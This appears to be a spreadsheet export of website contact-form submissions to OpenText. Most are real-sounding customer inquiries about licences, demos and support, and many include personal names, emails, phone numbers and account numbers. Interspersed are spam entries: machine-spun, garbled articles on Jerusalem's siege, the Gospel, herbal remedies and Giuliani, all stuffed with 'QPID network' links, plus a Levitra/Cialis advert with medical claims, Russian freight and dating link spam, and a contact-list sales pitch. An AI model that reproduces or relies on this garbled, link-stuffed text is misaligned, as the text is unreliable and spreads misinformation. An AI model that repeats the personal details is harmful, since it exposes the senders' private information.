september, Year 70 of more common decades. The [url=https://hk.linkedin.com/in/qpid-network-0280174a]QPID network[/url] Roman general Titus is normally putting stress to the hub [url=https://www.facebook.com/pages/Qpid-Network/285744041497098]qpid network[/url] of Jerusalem to produce months. the size of his forces have formerly breached the two external wall membrane and they're significantly operational off of using third and thickest one by working with major battering rams. through the city, the way it is has expanded passionate. the actual extremist faction created by rebels boasts burned up all the foodstuff products held in a misdirected difficult to force this town [url=https://www.youtube.com/watch?v=f0upJfcM8LY]qpid NTEWORK[/url] to combat the Romsoldiers ; choice,the way in which third walls stores, the actual of all Jerusalem must deprive so that it will demise. having said that the wall has no plans to accommodate in addition to the finishing days of the month, The Roman strains tote the town and thus, Infamously, hurt the great temple to the ground._x000D_
_x000D_
whenever such a residential district achieved subsist correct, his or her most people might found peacefulness regarding remote location at stick to the tenets of that morals and furthermore bear large-scale a diary earth, most of their thinking and as a result customs. But they will not have kept completely removed from the cataclysmic procedures to your east. in time, Roman troops was marching, not to mention controlling within his or her focus. individuals fled leading to a advance of the imperial military stowed her files but also most beloved destinations penetrating while in remote pc support caves run. yesterday damage most records and documents to function as a decayed beach Scrolls._x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
A minha empresa está a estudar a possibilidade de utilizar um dos vossos produtos, mais especificamente openText teamsite._x000D_
Gostariamos de ter mais informaçãos sobre o este produto nomeadamente:_x000D_
_x000D_
.Precos/licenças;_x000D_
.especificações de instalação;_x000D_
.Possibilidade de ter uma licença trial para verificar todas as potencialidades do produto._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Augusto G.</t>
  </si>
  <si>
    <t>Wir möchten Streamserve Projekte für einen Kunden entwickeln und benötigen Preisinformationen für einen Support Vertrag.</t>
  </si>
  <si>
    <t>Wir möchten unsere Abläufe Papierloser gestalten und planen die Einführung eine ECMs. Daher schauen wir uns im Moment verschiedene Lösungen an. Vereinbaren sie gerne einen Präsentationstermin mit uns!</t>
  </si>
  <si>
    <t>enterprise support for 250 empolyees, which include Secure Data Integration_x000D_
Integration with LDAP/Active Directory_x000D_
User / Role Administration_x000D_
Content Permissions</t>
  </si>
  <si>
    <t>I was a Hightail customer, do I need a new login with Open Text?</t>
  </si>
  <si>
    <t>Hello. 你好。 我想问一件事情。对你们我真的有兴趣。</t>
  </si>
  <si>
    <t>Have active account associated with Asite Solution (End User Code : EU0306192)_x000D_
_x000D_
Adminstrator has added myself as a Technical Contact and i have verified the account as well but still says i have no access to My Support page._x000D_
_x000D_
I have been logging technical ticket regularly though. No issues there. Can you please update this so i can have access to My Support page.</t>
  </si>
  <si>
    <t>specifically how managed to the Gospel of christ Christ unfold during Jerusalem to the Uttermost Parts of the planet_x000D_
_x000D_
The Gospel with regards to christ Christ started off as a high quality spark with Galilean hillsides even close to being two thousand prohibited, so straight away blazed close to more or less all physical blockers to become the earth's renowned best part about it in a brief history within humankind. quick review that the Gospel range doesn't only encourage us to go for its but also will help us see that is just the Gospel propelled in divine power._x000D_
_x000D_
multiplication together with Gospel initiated with the truly amazing transaction fee christ Christ bought his disciples prior to a here we are at ascension dad's hand side living in paradise : and also disciples regarding locations, Baptizing the lender in the Father as well as the youngster style the Holy, instruction them to see or watch all what I commanded you may. (Matthew 28:19, 20, on the web) as the dispersion coming from Gospel was an extremely good responsibilities the disciples had in order to meet, It called for the vitality in the Holy mood. in turn, christ stated to your partner's your body of believers to in the location of Jerusalem until you are clothed at run outside of found on huge. (luke 24:49) at this electric, through be witnesses regarding Christ across "Jerusalem, to all Judea and in addition Samaria, along with the uttermost parts of the earth, (shows 1:8)_x000D_
_x000D_
fundamental their personal Master's knowledge, The disciples continued to wait to Jerusalem for you to the gift with the Holy soul. while the day of Pentecost went, Were by using one contract in a post. you realise that also there originate from the sky a could be seen as the your company about a really end, and it also packed with all your home from where they were ski. Tongues comparable to start appeared with happened to be handed out with them, and something sat on each of them. they were all jam packed with the Holy</t>
  </si>
  <si>
    <t>I am looking for funding and support to develop app which supports banking._x000D_
I have heard you can help entrepreneurs to build the concept with your support._x000D_
_x000D_
Thanks_x000D_
Samuel boddu</t>
  </si>
  <si>
    <t>啊三大发送到发送到发送到发送到发斯蒂芬</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
I work in the operations/finance/HR department at our law firm and the majority of our documents are hard copies--we have a physical, external storage area for all of our files that we don't use anymore. I'd like to inquire about a potential service to facilitate online signatures and cloud storage of our department's documents. Would it be possible to schedule a phone call and then a demo to see if this is a viable service of yours? Thank you!_x000D_
_x000D_
Best,_x000D_
Valentina </t>
  </si>
  <si>
    <t>I am trying to raise a support ticket, but I am getting "No Access We're sorry, your account does not grant you access to this resource". Can you please check if I have access or not? if not, what I need to do to get access._x000D_
thanks._x000D_
Sunny Hsiao</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently assisting a client with the process to review potential content/document management systems. This process is in its initial phase and we are after a high level indication of the estimated licensing and, where possible, implementation (vendor) costs._x000D_
_x000D_
This is not a formal request for interest or tender but is to facilitate an upcoming board discussion that will determine how the selection process proceeds._x000D_
_x000D_
The client is considering both cloud and on premise solutions however cloud solutions must be hosted in Australia. _x000D_
_x000D_
The organisation expects:_x000D_
•	100-125 concurrent users_x000D_
•	280 users in total requiring access_x000D_
The total volume and size of documents to be managed through the system is currently being collated and can be provided if it is required to inform the cost estimate._x000D_
_x000D_
With this information we would like to understand the different licensing structure you have available and an estimate of the cost (or information we can use to calculate an estimate of the cost)._x000D_
_x000D_
We were also looking for general information (i.e. web brochures or fact sheets) you could provide around your solution including:_x000D_
•	Classification and categorisation of documents through tagging and metadata_x000D_
•	Mobility solutions for access and ingestion_x000D_
•	Security and control _x000D_
•	Document lifecycle management_x000D_
•	Any capabilities or examples of limited digital asset management (tagging and maintenance of photo libraries)_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Знакомства в Израиле бесплатно _x000D_
 _x000D_
[url=http://israface.com]Израиль еврейская социальная сеть и знакомства в израиле подробнее тут[/url]   </t>
  </si>
  <si>
    <t>Looking to learn more about your offerings for the IBM Notes Domino platform.  We are an IBM Business Partner who has client opportunity.  It is likely with Compose, but not sure yet._x000D_
Thanks.  Need your input asap.</t>
  </si>
  <si>
    <t>Need to modify 100 forms</t>
  </si>
  <si>
    <t>Learn how to get set up on gxs</t>
  </si>
  <si>
    <t xml:space="preserve">Initiative to streamline the multiple DAMs being used globally into 1 DAM. </t>
  </si>
  <si>
    <t>Hi, I purchased Brava Desktop TX 16.4 earlier today; I have tried to log in to my account to get my license key but that failed. I have tried to reset my password but that failed too. Can you help me get my software? Thanks, Jim Roots</t>
  </si>
  <si>
    <t>We are interested in eDocs DM and Email Filing for our small (but growing) law firm.  We currently have 7 attorneys and 7 support staff.  Can we make arrangements for a demo of what these programs can do for two or three of our staff people?  Please let me know the options.  Thank you!</t>
  </si>
  <si>
    <t>I see there is a new Hands-on lab at Enterprise world.  How do you sign up to use it?  I wat to look at the current user interfaces for Documentum.  We currently use 6.7SP2 and wnat to upgrade.</t>
  </si>
  <si>
    <t>We have purchased RightFax licences but want to discuss where to find the download files and get access to the My Support portal.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'm working on a roundup of data discovery products for a TechTarget article. I'd love to include a screenshot example of OpenText EnCase Risk Manager to accompany a blurb._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Jamison</t>
  </si>
  <si>
    <t>Hello,_x000D_
I have a two customers in the Boston are that are migrating from Centera to ECS.  They have asked me to confirm what versions of Documentum are supported on ECS 3.2.  Can you connect me with a technical person that can confirm supported versions?  Thank you</t>
  </si>
  <si>
    <t>Dear Sirs_x000D_
Our account number is US01-58476._x000D_
I would like to speak to our account manager as we are looking to expand our EDI relationship with GSX.    Please could you provide details or ask them to contact me.</t>
  </si>
  <si>
    <t>How do I get information on registering for local Toronto and Niagara tours during EW2018?</t>
  </si>
  <si>
    <t xml:space="preserve">Muy buen día._x000D_
agradecemos nos puedas colaborar con el siguiente requerimiento, nuestra necesidad de DMS es centralizar la información en la nube, con un back-up en los servidores, y que los archivos pueda estar compartido adicional es esencial poder acceder a diferentes versiones de los documentos que se encuentren en la plataforma y dar privilegios de acceso a determinado usuario._x000D_
Agradeceríamos nos ayudaras con una cotización para un máximo de 40 usuario. _x000D_
</t>
  </si>
  <si>
    <t>Hello. 你好。 想问一下。希望能帮我。谢谢</t>
  </si>
  <si>
    <t>Je vous contacte car je pense que ça serait intéressant d'avoir une petite conférence sur ce que fait Open Text en matière de gestion électronique des documents électroniques. _x000D_
_x000D_
On organise une "Journée AAQ" annuellement à Gatineau pour desservir la région AAQ ouest et on est à l'organiser actuellement. Il s'agit d'une journée de plusieurs conférences de 50 minutes. Ça va se tenir le 13 septembre et j'aimerais avoir un conférencier ou une conférencière qui nous parle d'Open Text, de Content Server. _x000D_
_x000D_
Stéphanie Bilodeau_x000D_
Trésorière, AAQ région ouest_x000D_
819-319-7452</t>
  </si>
  <si>
    <t>I am having issues with the path for the maps in workbench 5.0.  Please contact me for help. I have tried multiple things and nothing works. Thanks</t>
  </si>
  <si>
    <t>Need ECCN Information for TLE Professional Software as it pertains to Quote: 9000461250</t>
  </si>
  <si>
    <t xml:space="preserve">Require Brava for FileNet </t>
  </si>
  <si>
    <t>I am an IT administrator shopping for a document managment system for our finance department. I was hoping to get some quotes so i could bring it to my CFO and talk about what we have. _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Alex</t>
  </si>
  <si>
    <t>Hi. Can you please tell me whether CGI UK or CGI Group (Canada) has a Support Contract that gives us access to technical support for internal demo systems? If so, could you please email me the details that I need to gain access to the technical portal eg End User Number. Thanks, Rob</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I'd like to know if theres is an API to transfer command to a terminal (like navigating through options and screens) and obtain results from those command (results from a search)._x000D_
We have knowledge in C# , java and C_x000D_
_x000D_
In case there is an API or software to do this, I'd appreciate if you send me details._x000D_
_x000D_
Regards,_x000D_
Diego._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, I 'm Walter, I would love to know if you can handle website design for a new company and also if you do you accept credit cards?? _x000D_
_x000D_
Kindly get back to me ASAP so I can send you the job details. _x000D_
_x000D_
Regards_x000D_
Walter Meyers_x000D_
waltermeyers34@gmail.com_x000D_
650-294-8823_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Hi, _x000D_
I would like to discuss about OT CSP solution._x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve"> I'm working for a global company TVH and we're looking for a digital asset management system. We're working on a RFP and are wondering if you would like to participate in the tendering process. Thanks</t>
  </si>
  <si>
    <t>Gupta Report Builder</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
I hope all is well! I was reading through the Open Text blog this morning and would love to share an idea for a potential article topic._x000D_
_x000D_
As a Communications Specialist with the MAA Center, an online resource for those who have been exposed to asbestos and those looking to learn more about it, my goals are focused on raising awareness surrounding the dangers of asbestos in everyday life and the strides being made in cancer research._x000D_
_x000D_
I have some great information about how artificial intelligence is helping to detect cancers and the role AI is playing in the processing and sorting of data collected by cancer researchers. Would you be able to assist me or direct me to the person in charge of your blog and content calendar? Thank you in advance for your time and consideration!_x000D_
_x000D_
Talk soon,_x000D_
Anna Suarez, MAA Center</t>
  </si>
  <si>
    <t>RE: Login UKH77338_x000D_
_x000D_
I am trying to update the Inbound number on one of our accounts but I cannot do so.  I cannot delete the contents of the field and I cannot overwrite it.  I have tried in Firefox and Internet Explorer with and without Compatibility Mode.  I did also try to add a new number but I didn't see anywhere to put it in._x000D_
_x000D_
The record in question is:_x000D_
_x000D_
Primary Email: compressor.sales@ie.atlascopco.com_x000D_
_x000D_
Can you please update just the Inbound number to 35314567686._x000D_
_x000D_
Also, can you please advise why I cannot do this myself.  Having the same problem in Internet Explorer and Firefox makes me lean to it not being a browser problem.</t>
  </si>
  <si>
    <t>Looking for support of BIRT reporting tool</t>
  </si>
  <si>
    <t>Hello, I was trying to reach the right person who can help me in getting licence quotation.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
we would like to know about features &amp; capabilities DMS solution_x000D_
please contact me_x000D_
_x000D_
Regards_x000D_
Parmanand Shinde </t>
  </si>
  <si>
    <t>I am an OpenText partner in Denmark. But it seems difficult to get access to documentation like manual etc. Also we need a NFR to set this up in a training and test environment for a customer. Please point me in the right direction. Links to documentation on install and API please.</t>
  </si>
  <si>
    <t>Sexual relationship is often a pleasurable give to get relationship with one?s partner. If anything goes wrong on this give and take process, it's enough to derail the relationship. But anything sometimes happens and that is unpredictable. Moreover, able to keep a proper sexual relationship means keeping oneself physically healthy. So any kind of sexual disfunction must be helped by utmost care. One such health hazard is erection dysfunction commonly within men. Unable to keep a proper and prolonged penile erection results in erectile dysfunction. This is infact a life threatening problem for maintaining a healthy sexual relationship. So when there arises this type of problem it?s smart to treat it instead of sitting quiet. _x000D_
 _x000D_
The choice between the various available treatment methods involve treatment which has a proper medicine. Response to a verbal agent such as Levitra can be be extremely effective in this context. Studies show that male impotence is mainly on account of insufficient blood flow on the penis? veins and lack of stimulation as well. Practising oral therapy of Levitra raises the rate of blood flow that gradually stimulates the penis providing a hard erection, adequate to have an intercourse. _x000D_
 _x000D_
 _x000D_
 _x000D_
Levitra is a such drug which can be discovered to be effective. Clinically it's been proved which it even conditions patients who are suffering from various medical problems like high blood pressure levels, high cholesterol levels or diabetes. A lot of men, who took Levitra for the first time, responded positively for gaining high rate of success. Besides, it is often also found it can be also taken with medicines utilized to treat other medical conditions. _x000D_
 _x000D_
&lt;a href="https://www.cialispascherfr24.com/cialis-pas-cher-france-live/"&gt;https://www.cialispascherfr24.com/cialis-pas-cher-france-live/&lt;/a&gt;</t>
  </si>
  <si>
    <t>En collaboration avec notre IT je souhaite avoir des précisions /explications sur vos solutions</t>
  </si>
  <si>
    <t>bjr, FPLP groupe casino qui a déjà vos produits. nous sommes intéressés par un produit comme le votre._x000D_
pourriez-vous SVP nous contacter._x000D_
mail : gumbriano@fp-lp.fr pour un RDV et démonstration si possible._x000D_
cordialement,_x000D_
Umbriano G</t>
  </si>
  <si>
    <t>We are looking for an alternative of process maker tool, please can you schedule a demo call to proceed.</t>
  </si>
  <si>
    <t xml:space="preserve">health advantages of mythical beasts bloodstream Sangre de Drago_x000D_
_x000D_
Dragon's body (Sangre l'ordre de Drado)Sangre environnant les drago is bonsai which unfortunately springs up throughout amazon marketplace rainforest. this has been written in december, 2011. very little Komodo mythical beasts get sprained to get this to organic treatment. Dragon's blood is sometimes known as sangre de grado and sangre drago. buttons listed below are in burgandy._x000D_
_x000D_
The sap using the sangre dom grago tree is designed for restorative. Sangre p drago involves dragon's our blood all the way through language. this particular traditional name due to the fact christmas tree is croton lechleri. Wikipedia declares:_x000D_
_x000D_
Croton lechleri has been a types of blooming plant included in the spurge folks, Euphorbiaceae, that could be indigenous to northwestern south usa. It is typically referred to as Sangre p Grado (Peruvian speaking spanish) maybe Sangre pour Drago (Ecuadorian spanish language), as both versions convert to be able to "Dragon's your blood, which discuss with the tree's deep purple latex.[2]_x000D_
_x000D_
the specific latex boasts healing areas, And is commonly used by community parents to become a liquids bandage, rubbed into complience seal pains, given that dries out suddenly to create a preventative flesh most notably concern_x000D_
_x000D_
there is an doctrine of most signatures. this is when style and design gives a hint as to the an herb or healing sow is perfect for. The drain coming from the sangre pour drago spec looks like blood stream taken from a shape. potentially its retains are really shaped like cardiovascular system. One scientist also texts message or calls this method morphism however,though I don't see that via the internet, similar to doctrine along with signatures. Wikipedia affirms:_x000D_
_x000D_
The doctrine together with signatures regarded as a way of life discussed through herbal healthcare specialists via your time in addition to the Dioscurides Galen. a doctrine state governments that </t>
  </si>
  <si>
    <t xml:space="preserve">Trying to find out what versions of the software we can download give we have an active support contract._x000D_
_x000D_
I have no idea where to check or what infomation you require. Our support contract number is 0012268824 and our customer id is 10202050_x000D_
_x000D_
Mark Keogh_x000D_
Mediaocean APAC_x000D_
</t>
  </si>
  <si>
    <t>Giuliani they're competent every one of the washington site_x000D_
_x000D_
Giuliani, the former ohio gran and web sites element to help you ceo Trump's legal core, suggested thursday night that a lot of Trump made numerous repayment demands reimbursing the mans attorneys jordan Cohen for the $130,000 negotiation now with person of legal age slide film presenter stormy Daniels despite the presence of Trump's report work month he has unacquainted with the any payment._x000D_
_x000D_
Trump "doesn't know of the main features today, significantly i've met. but rather he accomplished know the typical bouquet, those ellie is keep up stuff like this, Like I get rid such things as this containing brand new prospects, Giuliani announced. "i will not weight them with each element why gets here. these are definitely on the go the public.''_x000D_
_x000D_
second meeting with them,talk to, Giuliani spoke by phone through the california statement to go over instant after effects, Trump's knowledge of michael's views and the continued certain advice study [url=https://www.youtube.com/watch?v=f0upJfcM8LY]QPID network[/url] to get into russian disturbance inside of the 2016 presidential call campaign._x000D_
_x000D_
[Giuliani: Trump refunded legal Cohen during raining Daniels contract]_x000D_
_x000D_
this particular has been a lightly modified transcript._x000D_
_x000D_
michael jordan Cohen leaving legal court docket in the los angeles previously month. (jane Altaffer/AP)_x000D_
_x000D_
the particular [url=https://twitter.com/qpidnetwork?lang=en]Qpid Network[/url] wa Post's Robert Costa: in which offers the director asked information about majority of these a monthly payment?_x000D_
_x000D_
Rudolph t. Giuliani: He had not been given that it was somewhere in 10 additionally five days leading to a political election. in which he isn't divulged. even so although this individual experienced been declared, your man would not maintain recalled this task, that include I might not has loved things. the minute, at the time he remitted of his private cash in hand and also you listen to C</t>
  </si>
  <si>
    <t>May I have the contact details of the authorized dealer(s)/distributor(s) of RightFax in Hong Kong?  Thanks.</t>
  </si>
  <si>
    <t>Content Migration Inquiry</t>
  </si>
  <si>
    <t>ocfptr@tulnl.xyz</t>
  </si>
  <si>
    <t>Looking for a job urgently . it would be a pleasure if you let me know if there is any position available . Thank you.</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are using your Alchemy system since last 15 years and missing support since last two years the time when you ceased your contact with local resellers. _x000D_
We tried to contact on local number provided on your website but no response. _x000D_
We even left voice mails but no return call. _x000D_
We also wrote to au_support@opentext.com but again no response. _x000D_
What type of service you guys are providing?_x000D_
_x000D_
Please let us know how can we have a maintenance and support arrangement for Alchemy system. The SUID provided by your previous reseller is SUID# 47415-12147_x000D_
_x000D_
Regards_x000D_
Shaukat Hasan_x000D_
Business Solutions Manager_x000D_
CNH Industrial Capital Australia</t>
  </si>
  <si>
    <t>Looking for a job Urgently... Please let me know if there is any position available..  I am from Hospitality management. It would be a pleasure . Thank you .</t>
  </si>
  <si>
    <t xml:space="preserve">(cannot put URLs in contact form, so spaced it out)_x000D_
Hi, I'm an amateur bug bounty hunter, and while poking around your site I found something strange. I dont know how much of a security risk this might lead to (if any), but if you go to this link to your developer site, it creates an infinite loop of reloads - developer . opentext . com / webaccess / # url = %2F..%2F&amp;tab=501_x000D_
_x000D_
The original URL has # url = %2Fawd%2F&amp;tab=501, so I had changed "awd" to ".." to see if I could go up a directory. _x000D_
_x000D_
I dont know for sure, and would not want to test on your live website. However, this could possibly be used to DDOS your website. </t>
  </si>
  <si>
    <t xml:space="preserve">I need to cancel support on a product.  We have migrated off of the Opentext product and will not need support on it anymore. _x000D_
Our open invoice will not be paid and I want to make sure it gets cancelled._x000D_
Thanks, _x000D_
Greg McKinley _x000D_
IT Director_x000D_
Petzl America </t>
  </si>
  <si>
    <t>I would like to know the capability of Open Text for a project.</t>
  </si>
  <si>
    <t>General cost inquiry_x000D_
I just want to see if your software would fit into our approx $10,000 budget/yr_x000D_
Looking to embedd reporting and visualizations into our SaaS that is run in AWS.  We would have 1 production server and 2 development servers.  We have under 200 users which will grow slowly.  I'm not actually sure which Products I would need but I think we would need the Analytics Suite and iHub?</t>
  </si>
  <si>
    <t>I'd like to request a demo for the Contract Center and Compliance modules in CS16 _x000D_
Thanks,</t>
  </si>
  <si>
    <t>I´m trying to download the Gartner 2017 Magic Quadrant for Content Management Services Platforms through you Internet page. I subscribed but nothing happens.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'm trying to reset my password for the GXS catalog system, but the password that is being sent to me isn't allowing me to log in._x000D_
_x000D_
Account is under tboyden@colonialmills.com, which I'm receiving the forwards._x000D_
_x000D_
Network ID: CO144  _x000D_
User ID: CO144A  _x000D_
_x000D_
Thanks,_x000D_
Chris</t>
  </si>
  <si>
    <t>I had someone from your office call me and as we were booking a meeting the line got disconnected. I need someone to call me back and finish that booking. We are looking at a few vendors now and would like to proceed soon.  Thanks.</t>
  </si>
  <si>
    <t>Hi, Want to find out how to reinstall licenced BRAVA! Desktop CXL to a new computer? Thank you. Regards, Sunny Tam</t>
  </si>
  <si>
    <t xml:space="preserve">международные грузоперевозки Екатеринбург отзывы_x000D_
недорогие международные грузоперевозки Пермь отзывы_x000D_
международные грузоперевозки Екатеринбург_x000D_
недорогие грузоперевозки Россия Казахстан_x000D_
грузоперевозки Екатеринбург_x000D_
недорогие международные грузоперевозки Томск отзывы_x000D_
недорогие грузоперевозки Омск отзывы_x000D_
грузоперевозки Пермь_x000D_
недорогие грузоперевозки Тюмень отзывы_x000D_
недорогие международные грузоперевозки Россия Казахстан_x000D_
 _x000D_
[URL="https://mityr-trans.com"]грузоперевозки Челябинск[/URL] _x000D_
грузоперевозки Россия Беларусь_x000D_
международные грузоперевозки_x000D_
международные грузоперевозки Екатеринбург_x000D_
недорогие грузоперевозки Омск отзывы_x000D_
грузоперевозки Пермь_x000D_
грузоперевозки Россия Казахстан_x000D_
грузоперевозки Россия Беларусь отзывы_x000D_
недорогие международные грузоперевозки Томск_x000D_
недорогие международные грузоперевозки_x000D_
международные грузоперевозки Томск отзывы_x000D_
</t>
  </si>
  <si>
    <t>I am a consultant working with the Cayman Island Government and they asked me to reach out to you to let you know they have released an RFP for  WORC Management System (Digital Process Automation Software)_x000D_
_x000D_
They indicated that your company might be a good fit and would like for you to respond to the RFP_x000D_
_x000D_
If you are interested in seeing the RFP the Cayman Island Government post all of their tenders on their procurement portal Bonfire _x000D_
_x000D_
Please contact me and I can provide the URL link where you can take a look at the RFP and determine if you would like to respond.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a legal document and contract management system and would like a demo. </t>
  </si>
  <si>
    <t>We would like to speak to someone about re-opening our account but we do not have a direct contact. We are looking for help with adding new product to our catalog and getting UPCs. Please contact us as soon as possible.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in discussing about the updated B2B database from Health IT professionals industry._x000D_
_x000D_
We have complete contact details of CIO's, CTO's, CNO's, CNIO's, CMO's, CMIO's, Clinical Engineering Professionals, Clinical Informatics, Healthcare Financial Professionals, IT Professionals, Doctors, Nurses, Pharmacy Professional, Physician, Public Health Practitioner, Public Health Practitioner, Dentist (All Specialty) and Medical Consultants._x000D_
_x000D_
Industries List: Hospitals, Drug Stores, Pharmaceutical, Manufacturers, Otolaryngologists, Medical Devices &amp; Equipment's, Clinical Trial &amp; Clinical Research, Retail &amp; Distribution and many more._x000D_
_x000D_
Kindly share your specific Industry/Geography/Job titles you want to target, I will send you counts, and pricing for your reference._x000D_
_x000D_
• Email Appending: if you have any in-house list without emails or missing information, we can append that info to the same and deliver back to you._x000D_
_x000D_
I’m looking forward to working with you._x000D_
_x000D_
Best Regards,_x000D_
Kevin Daniels</t>
  </si>
  <si>
    <t>Interested in looking at your ECM solution</t>
  </si>
  <si>
    <t>buenas tardes_x000D_
deseamos conocer documentum, para ver si se adapta a nuestros requerimientos como sistema de control documental. gracias</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I'm the network manager at Maine Maritime Academy in Castine, Maine.  We've been using FirstClass at our campus for several years, including on our training ship the State of Maine.  _x000D_
_x000D_
I'd like to talk to your developers about a version of FC that functions only as a gateway.  You see FirstClass is unique in the way it retrieves and sends emails.  It's the only system I've found that will allow me to have an email server on the ship that initiates all the email exchanges.  Thus allowing me to have my own server behind satellite connectivity where I have no way to route traffic to the ship.  _x000D_
_x000D_
MMA (Maine Maritime Academy) has been contacted by some of the other maritime colleges to see how we were able to provide email to all our students, FC is the answer._x000D_
_x000D_
Would you be willing to talk to me about how we could develop this for the maritime industry?_x000D_
_x000D_
Regards,_x000D_
Norm Yates_x000D_
</t>
  </si>
  <si>
    <t>Hello, we are a Cloud Solutions Consultancy Firm and we are very interested in the OpenText Women in Technology Summit. I am just wondering how much it costs to attend as I couldn't find this information on the website. We need to know how many of us can go according to budget. Thank you in advance. _x000D_
Mayssa</t>
  </si>
  <si>
    <t>I support an eRooms product used by HMRC. I am currently seeing event viewer error messages with the following error "The eRoom Scheduler encounter errors: Errors occurred during incoming email: No mail server Specified." I know this seems like a fairly intuitive error message but our eRooms product does not use incoming mail therefore I want to know how to get rid of this error message if possible. Thanks</t>
  </si>
  <si>
    <t xml:space="preserve"> I do not have the name of our account manager and we would like to discuss upgrading our RightFax database to SQL 2016 to provide high availability. Please contact me ASAP.</t>
  </si>
  <si>
    <t>A couple weeks ago we had a virus infect our whole college, including servers.  We had had to restore server from backup, but I am unable to get my RightFax Express server started.  I'm not sure why  and am looking for assistance in getting the server started.  Thank you,  Joe</t>
  </si>
  <si>
    <t>I have tried creating an OpenText Core account with the email listed above but I am not receiving the confirmation email to begin using my account. Please advise on how to solve this issue.</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in learning more specifically about your Magellan product - could we arrange a conf call ?  thank you </t>
  </si>
  <si>
    <t>Nie mogę zalogować się do swojego konta    na OpenText    ( czeszakm@wp.eu )</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are looking for a CX solution to be able to measure, analyse and act on VoC collected from various sources and would like to know if Open Text provides any solutions that could help us achieve our customer research needs.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren!_x000D_
Herr Dieter Reichel von der SAP Österreich hat uns kurz die "OpenText Employee File Management for SAP Solutions" Lösung präsentiert. Da wir hier Interesse haben, bitte ich um Kontaktaufnahme zur Vereinbarung eines Präsentationstermins._x000D_
LG_x000D_
Helmut Tieber_x000D_
</t>
  </si>
  <si>
    <t>i registered for Enterprise world (vfnnkgdflqm) as an elite member but with no point (i dont know if i have any) At check out it said $1695 credit, total due $200. I firgured I had credit from being an elite member. So I entered my info and it now says $1895 pending payment?  Please let me know if it is supposed to be $200 due to being an elite member. Im trying to find out how many point i have but dont know where to look.</t>
  </si>
  <si>
    <t>Please provide contacts of implementation partners of Documentum in India._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Madam or Sir,_x000D_
_x000D_
we were in contact regarding the position "Accounts Receivable Collections Specialist Bilingual German" some months ago. My immigration process back then was not clear; my family and I just got informed that we can start looking for a job in Ontario. _x000D_
_x000D_
I was wondering if you are still looking for someone in the financial field with bilingual German skills in Toronto, ON._x000D_
_x000D_
_x000D_
If you have any job to offer in my profession, please feel free to write me an Email or give me a phone call to arrange an interview._x000D_
_x000D_
Thank you in in advance._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
PAUL_x000D_
</t>
  </si>
  <si>
    <t>Evidentlyobviooughouts _x000D_
_x000D_
EmperorofPrussia 20 components registered 25 days past_x000D_
_x000D_
the customer brought to mind probably the greatest egregiously dumb periods i've ever personally ended up a party for you to, presents was a your childhood mature when 2002. i became pushing in along two neighbours inside my used car, One in top seat, your decide one in a corner. the one in the trunk stood a Romanian AK 74 identical copy the michael's my father gifted him / her; motive he been with them that includes that person, I couldn appropriately express. on the other hand i made an immediate blunder in prudence [url=https://www.pinterest.com/qpidnetwork/]QPID NETWORK[/url] as a result of trusting your ex to that going barefoot was totally unloaded, and the business this can ourselves. lessons even learned. prolonged journey little, actually was going out of the office he "mistakenly" terminated 3 techniques along with the floorboard in immediate succession as they offers using it. one bullets went through the catalytic ripper tools, and also an additional blew trip digit of his particular ballet shoe and yet missed foot. more painful, the exact windows ended moving up all the things i should have read for hours was seen as "Eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee,_x000D_
_x000D_
in conclusion, dude in front side bench, who has been noticeably excitable, created your pistol at products deep in a parking area, likewise [url=https://www.appbrain.com/dev/Qpid+Network/]QPID network[/url] coping with to that clip or barrel. within the by, The dumbass shooter is here a operating doctor who currently is with chiropractors without need of beds and borders in the car._x000D_
_x000D_
undoubtedly the actual other cooker_x000D_
_x000D_
The sport bike helmet is in fact waiting off sideways (lead a section of the image)_x000D_
_x000D_
the masai have a ring number one of the item where you could presume the street bike sets on_x000D_
_x000D_
I to be truthful realize all of the is extremely lustrous it is really not even transparent from now on. i had to sp</t>
  </si>
  <si>
    <t>Hej!_x000D_
Vi har en kund (statlig myndighet) som ev är intresserad av en licens från er. Vi undrar om vi har möjlighet att återförsälja licenser från er?_x000D_
Hoppas på snart återkoppling._x000D_
_x000D_
Med vänlig hälsning_x000D_
Susanne Hultberg</t>
  </si>
  <si>
    <t xml:space="preserve">EuroSciCon is organizing meeting 8th Edition of International Conference on Big Data &amp; Data Science 2019 is scheduled from March 04-05 at Barcelona, Spain. EuroSciCon is the UK based independent life science Events Company with predominantly business and academic client base._x000D_
The 2019 meeting promises to be a dynamic and informative event and going to explore the issues on work related factors,  innovations and integrated approaches towards data mining &amp; analysis, the speakers are a multidisciplinary gathering of globally perceived specialists that speak on the Data Mining with a theme on Exploring Future Technologies for Data Mining &amp; Analysis!!!_x000D_
This is 2-day Meeting and you can participate in a number of educational formats including General Sessions, Poster Presentations, and Workshops/Symposium, Meet-the-Professor Sessions, Oral Presentations and other interactive and informal exchanges._x000D_
</t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
We are using Documentum IRM._x000D_
We plan to use Documentum IRM on a new platform._x000D_
Before we carry on the plan, I want to confirm as below._x000D_
 _x000D_
